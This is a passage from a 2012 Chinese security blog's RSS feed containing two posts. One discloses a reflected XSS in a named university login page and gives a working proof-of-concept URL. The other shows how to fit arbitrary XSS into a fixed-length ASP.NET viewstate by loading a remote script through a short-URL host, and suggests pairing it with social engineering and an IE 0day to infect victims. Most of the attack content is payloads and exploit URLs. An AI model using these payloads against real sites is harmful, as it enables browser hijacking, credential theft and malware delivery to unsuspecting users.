&lt;div style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;img alt=&quot;&quot; src=&quot;https://jury.ucoz.net/imges/hduxss.jpg&quot;&gt;&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;</description>
			<content:encoded>By: PortWatcher&amp;nbsp;
&lt;div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div&gt;很无聊的一个漏洞，应该只能配合社工才能发挥作用。一个GET参数没有过滤。我认为这个参数根本就不该暴露给用户，因为没有意义，可能是因为编程简单一些吧。
&lt;div&gt;URL：&lt;a href=&quot;http://xsdcb.hdu.edu.cn/login.asp&quot; target=&quot;_blank&quot;&gt;http://xsdcb.hdu.edu.cn/login.asp&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;这个地方的ERRMSG后面的参数直接放入 alert函数，没有做任何过滤。我们可以通过闭合之前的&lt;script&amp;gt;标签，然后构造自己的&lt;script&amp;gt;标签达到让浏览器运行我们构造的JS脚本的目的。&lt;/div&gt;
&lt;div&gt;这里还是以弹一个框框为例，注意这里的框框不是MSGERR的框框，而是我们自己构造出来的，我们还可以把它修改为任意XSS，自己看代码，不做过多解释。&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div&gt;例如：&lt;/div&gt;
&lt;div&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://xsdcb.hdu.edu.cn/login.asp?ErrMsg=&apos;);%3C/script%3E%3Cscript%3Ealert(&apos;xss%20pw&quot;&gt;http://xsdcb.hdu.edu.cn/login.asp?ErrMsg=&apos;);&lt;/script&amp;gt;&lt;script&amp;gt;alert(&apos;xss pw&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div style=&quot;TEXT-ALIGN: center&quot;&gt;&lt;img alt=&quot;&quot; src=&quot;https://jury.ucoz.net/imges/hduxss.jpg&quot;&gt;&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/xss/2012-08-08-118</link>
			<category>漏洞信息</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/xss/2012-08-08-118</guid>
			<pubDate>Wed, 08 Aug 2012 04:56:08 GMT</pubDate>
		</item>
		<item>
			<title>37个字节实现任意XSS</title>
			<description>文章来源：&amp;nbsp;&lt;a href=&quot;http://www.portwatcher.net/blog/37_xss/2012-07-17-117&quot;&gt;http://www.portwatcher.net/blog/37_xss/2012-07-17-117&lt;/a&gt;&lt;br&gt;By:PortWatcher&lt;br&gt;&lt;br&gt; 假设现在我们有一个XSS，它是通过viewstate来引发的。w3af给出的测试页面是 &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt; &lt;br&gt; http://www.********.com/auth/Default.aspx?__VIEWSTATE=%2fwEPDwUKLTY4NzcyMTIyMg9kFgICAQ8W&lt;br&gt;Ah4JaW5uZXJodG1sBSY8c2NyaXB0PmFsZXJ0KCdBU1AuTkVU&lt;br&gt;IFhTUycpOzwvc2NyaXB0PmRk&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt; 通过burpsuite，可以查看到这个viewstate的值为： &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:a...</description>
			<content:encoded>文章来源：&amp;nbsp;&lt;a href=&quot;http://www.portwatcher.net/blog/37_xss/2012-07-17-117&quot;&gt;http://www.portwatcher.net/blog/37_xss/2012-07-17-117&lt;/a&gt;&lt;br&gt;By:PortWatcher&lt;br&gt;&lt;br&gt; 假设现在我们有一个XSS，它是通过viewstate来引发的。w3af给出的测试页面是 &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt; &lt;br&gt; http://www.********.com/auth/Default.aspx?__VIEWSTATE=%2fwEPDwUKLTY4NzcyMTIyMg9kFgICAQ8W&lt;br&gt;Ah4JaW5uZXJodG1sBSY8c2NyaXB0PmFsZXJ0KCdBU1AuTkVU&lt;br&gt;IFhTUycpOzwvc2NyaXB0PmRk&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt; 通过burpsuite，可以查看到这个viewstate的值为： &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;script&amp;gt;alert(&quot;ASP.NET XSS&quot;)&lt;/script&amp;gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt; &lt;img src=&quot;http://www.portwatcher.net/sceenshot-8.png&quot; border=&quot;0&quot; alt=&quot;&quot;&gt; &lt;br&gt;&lt;br&gt; 如果我们要利用XSS，光弹一个框框是远远不够的。这是一个反射型XSS，结合社工和IE 0day我们可以让别人中马。我们先尝试让它跳转到指定页面，比如说百度。 &lt;br&gt; 比较直接的思路是修改viewstate的值，你会说这有什么难的，未MAC加密的viewstate不就是一个base64么。但如果真的能这么简单地修改就不会有这篇文章了。你可以试试直接修改解密后的js然后再加密。你会发现以这样的viewstate访问将导致服务器报错，因为viewstate的值的长度是固定的，假设我们让这个js实现跳转百度的功能，那么它的内容应该是 &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;script&amp;gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&amp;gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt; 这个长度远远超过w3af给你的XSS，当然会报错。我所知道的最短的跳转页面的语句为top.location=&quot;&quot;，这个依然太长了。 &lt;br&gt;&lt;br&gt; 我找不到可以修改viewstate的值而不因改变长度破坏其结构的工具，只能硬着头皮构造出与《script》alert(&quot;ASP.NET XSS&quot;)《/script》长度一样的又能实现我想要的效果的XSS来。 &lt;br&gt;&lt;br&gt; 首先我们很自然地可以想到包含，于是我在朋友分我的vps上放了一个js脚本，内容如下： &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt; 将其命名为1.js，那么我们的XSS就应该为 &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;script src=&quot;http://aaaaaaa.tk/1.js&quot;&amp;gt;&lt;/script&amp;gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt;&lt;br&gt; 这样短了一点，可和目标相比还是太长了。我们分析一下哪里还可以缩短，《script》标签是不能动的，这个必须有，那么只能在网址上面下文章了。你可能会建议我申请一个1个字母的域名，可是注册到1个字母的域名难度很大而且还需要等待域名生效。&amp;nbsp;&lt;div&gt; 我这里想到的是用短域名，通过短域名来把网址变短。我找了一会儿，终于发现了一个最短的短域名服务，太叽网http://2.gy/。这个短域名可以说是短到不能再短，比google，新浪，腾讯提供的短域名服务都要短一些。这个域名支持自定义的短域名，http://2.gy/后面可以自定义。我开始想弄一个字母或者一个字符，发现都已经被别人用掉了，于是只好用了1个字母和1个字符的短域名，这样一共占有2个字节，也不算多。 &lt;br&gt; http://aaaaaaa.tk/1.js经过转换就成了http://2.gy/**，这样就够短了，哈哈。 &lt;br&gt; 最终我们构造出来的XSS为: &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt;&lt;script src=&quot;http://2.gy/**&quot;&amp;gt;&lt;/script&amp;gt;&lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt; 比了一下，和《script》alert(&quot;ASP.NET XSS&quot;)《/script》长度一样。37个字符。这样长度的XSS直接base64加密，然后替换掉原来viewstate的值，通过浏览器访问，发现是可以跳转到百度的。 &lt;br&gt;&lt;br&gt; 总结，这里利用了两次转换。第一次是把真正要执行的js写到其他文件，然后通过远程包含的方式来执行；第二次是通过短域名把网址变短。 由于1.js的内容是可以修改成任何你想要的js代码的，所以这个方法应该是可以实现任何js的XSS了。&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;当跨站长度受到限制的时候&lt;/span&gt;，可以考虑这个方法。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;br&gt; 如果有能修改viewstate而不破坏其结构的工具请务必告知，鄙人万分感谢。&amp;nbsp;&lt;br&gt;&lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/37_xss/2012-07-17-117</link>
			<category>技术文章</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/37_xss/2012-07-17-117</guid>
			<pubDate>Tue, 17 Jul 2012 18:57:04 GMT</pubDate>
		</item>
	</channel>
</rss>